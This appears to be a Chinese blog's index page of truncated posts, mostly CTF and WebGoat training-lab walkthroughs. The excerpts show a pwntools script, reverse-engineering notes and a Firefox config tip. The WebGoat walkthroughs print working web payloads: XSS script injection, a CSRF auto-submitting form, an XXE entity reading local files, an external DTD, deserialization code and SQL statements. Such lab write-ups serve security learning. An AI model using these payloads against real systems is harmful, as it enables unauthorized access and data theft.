riChar

数学咋样？也就20道加法，手算也可以（bushi。 还是用python写个脚本吧。。 12345678910111213141516from pwn import *import resh = remote("81.69.0.47",1111)sum=0while True: try: a=sh.recvline(keepends=False).decode() findings=re.findall(r"!\[.*\] num_1 = ([0-9]+), num_2 = ([0-9]+)",a) if len(findings)!=0: sum=int(findings[0][0])+int(findings[0][1]) print(a) if a=="I can't calculate the expression 'num_1 + num_2'.": sh.recvun ...

No RE no gain文件: HelloRE.exe IDA打开，有手就行。 我真不会写驱动！文件: SycDriver.sys 有手就行。 WhatsApk文件: WhatsApk.apk apktool解压，vscode搜索SYC{。 HelloAndroid文件: HelloAndroid 同上。 re00文件: re00 简单的异或。 maze文件: maze.exe 通过字符串找到主函数为sub_401A10。 迷宫宽度为0x1F，o为墙，E为终点。起点是0xD9，换算一下坐标是(7,0)，这道题有一个特殊之处，它的坐标是用一个量表示的，所以可以通过左右从边缘移动到上一行或下一行。 把地图提取出来，可以用正则替换来实现0x1F个字符换行。.{31}替换成$0\n。 地图不大，没有分叉，看看就行。 Hello .NET文件: WpfAppCS.exe dnSpy打开。简单的加密函数。 1234567891011121314151617181920212223242526import java.util.ArrayList;publ ...

Challenges最后一章了！！！ Admin lost password先用sqlmap探测一下，两个参数是否能sql注入，但似乎都不行。再试一下弱密码，也不行。 看看那张logo，下载了看看用Stegsolve看看。啥也看不出来，太难了，还是翻源码吧。 12345678910111213String PASSWORD = "!!webgoat_admin_1234!!";@PostMapping("/challenge/1")@ResponseBodypublic AttackResult completed(@RequestParam String username, @RequestParam String password, HttpServletRequest request) { boolean ipAddressKnown = true; boolean passwordCorrect = "admin".equals(username) && PASSWORD.rep ...

Client sideBypass front-end restrictions前端检验的绕过。 Stage 2绕过表单的限制大部分只要修改value就好了。如图修改 Stage 3抓包，然后参数随便改。 Client side filteringStage 2当点击过下拉框后会发现多了一个隐藏的table。 Stage 3直接查看源码，发现有一行注释，把注释的checkout code 填入，发现只是打了折，并没有免费。 可以在价格节点上打上断点， 再让价格改变时，看看调用堆栈，找到这样两个函数： 看来使用ajax发送请求来判断是非能打折。仔细研究一下这个请求，当它在没有参数时会返回所有可能的checkcode。那答案是get_it_for_free。 HTML tamperingStage 2直接修改checkout按钮发送的请求的参数就好了。

手机没有装知乎和简书时，用Firefox浏览网页版时，总是会这样： 解决方法：手机Firefox地址栏输入about:config。 插入两个键network.protocol-handler.external.zhihu和network.protocol-handler.external.jianshu，值都为false就行了。

(A9) Vulnerable ComponentsVulnerable Components相比自己写的代码，使用的组件往往更容易被找到漏洞，因为寻找组件的漏洞的价值远比寻找一个网址的漏洞来得大。 Stage 12这题是利用一个给出的漏洞，详细内容可以去这里查看。可以利用这个漏洞对上传其它类型的对象，或给类加上动态代理。答案为 123<java.lang.Integer>1</java.lang.Integer> (A8:2013) Request ForgeriesCross-Site Request ForgeriesCSRF也是一种经典的攻击方式了。 Stage 3再写一个网页。 12345678910111213141516<!DOCTYPE html><html><head> <script> function f() { document.getElementById("form").submit(); } ...

(A7) Cross-Site Scripting (XSS)Cross-Site ScriptingStage 2同一个站点，cookie是相同的，所以回答yes。 Stage 7在卡号的框里输入<script>alert("xss")</script> Stage 10前端路由模式，test路径在url上怎么表示。 start.mvc#test Stage 11可以直接访问http://127.0.0.1:8080/WebGoat/start.mvc#test/test=%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E，控制台里就会输出phoneNum了。 Stage 12自己做吧。 (A8) Insecure DeserializationInsecure DeserializationStage 5先写一段java进行序列化 1234567891011121314151617181920212223242526272829303132package org.dummy.i ...

(A4) XML External Entities (XXE)XEEStage 4把请求的XML改成这样： 1234567<?xml version="1.0"?><!DOCTYPE comment [ <!ENTITY js SYSTEM "file:///">]><comment> <text>&js;</text></comment> Stage 7虽然请求是用的json，但是我们可以直接把Content-Type改成application/xml，把上面的xml再发一遍就行了。Stage 8是完整的解题过程。 Stage 8在WebWolf里上传文件a1.dtd。 12<?xml version="1.0" encoding="UTF-8"?><!ENTITY % write "<!EN ...

(A2)Broken AuthenticationAuthentication Bypasses讲了一些简单的绕过认证的方法。 Stage 2拦截给两个参数换个名字就行了。 翻了一下它的源代码： 12345678910111213public boolean verifyAccount(Integer userId, HashMap<String, String> submittedQuestions) { if (submittedQuestions.entrySet().size() != secQuestionStore.get(verifyUserId).size()) { return false; } if (submittedQuestions.containsKey("secQuestion0") && !submittedQuestions.get("secQuestion0").equals(secQue ...

(A1)InjectionSQL Injection (intro)这一节介绍一些基本的SQL语言和SQL注入的原理。SQL语法不会的可以去这里学习。这边比较基础的SQL语句就直接放出来了。 Stage 21SELECT * FROM Employees WHERE first_name='Bob' AND last_name='Franco' Stage 31UPDATE employees SET Department='Sales' WHERE first_name='Tobi' AND last_name='Barnett' Stage 41ALTER TABLE employees add column phone varchar(20) Stage 51GRANT ALTER TABLE to UnauthorizedUser Stage 9最后拼接后是这样： 1SELECT * FROM user_data WHERE first_name = 'John ...